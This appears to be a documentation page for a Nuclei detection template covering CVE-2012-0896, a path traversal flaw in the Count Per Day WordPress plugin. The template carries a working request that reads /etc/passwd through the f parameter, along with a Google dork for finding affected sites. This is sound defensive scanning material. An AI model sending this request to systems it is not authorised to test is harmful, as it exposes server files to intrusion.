Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access
ID: CVE-2012-0896
Severity: medium
Author: daffainfo
Tags: cve,cve2012,packetstorm,lfi,wordpress,wp-plugin,traversal,count_per_day_project
Description
Section titled “Description”An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
YAML Source
Section titled “YAML Source”id: CVE-2012-0896
info: name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access author: daffainfo severity: medium description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. impact: | An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further compromise of the system. remediation: | Upgrade to a patched version of the Count Per Day plugin (version 3.2 or above) or apply the vendor-supplied patch to fix the path traversal vulnerability. reference: - https://packetstormsecurity.com/files/108631/ - http://plugins.trac.wordpress.org/changeset/488883/count-per-day - https://https://nvd.nist.gov/vuln/detail/CVE-2012-0896 - http://wordpress.org/extend/plugins/count-per-day/changelog/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/72385 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2012-0896 cwe-id: CWE-22 epss-score: 0.01844 epss-percentile: 0.883 cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: count_per_day_project product: count_per_day google-query: inurl:"/wp-content/plugins/count-per-day" tags: cve,cve2012,packetstorm,lfi,wordpress,wp-plugin,traversal,count_per_day_project
http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 490a0046304402201f013765f17ee876af22ead30f83a1c24170c2766cd6357374b03106fd82a09102200ffc9df0dc31b1a2db500b12fc27c0f3e4f20d281327309b568ca7d9ec02c741:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2012/CVE-2012-0896.yaml"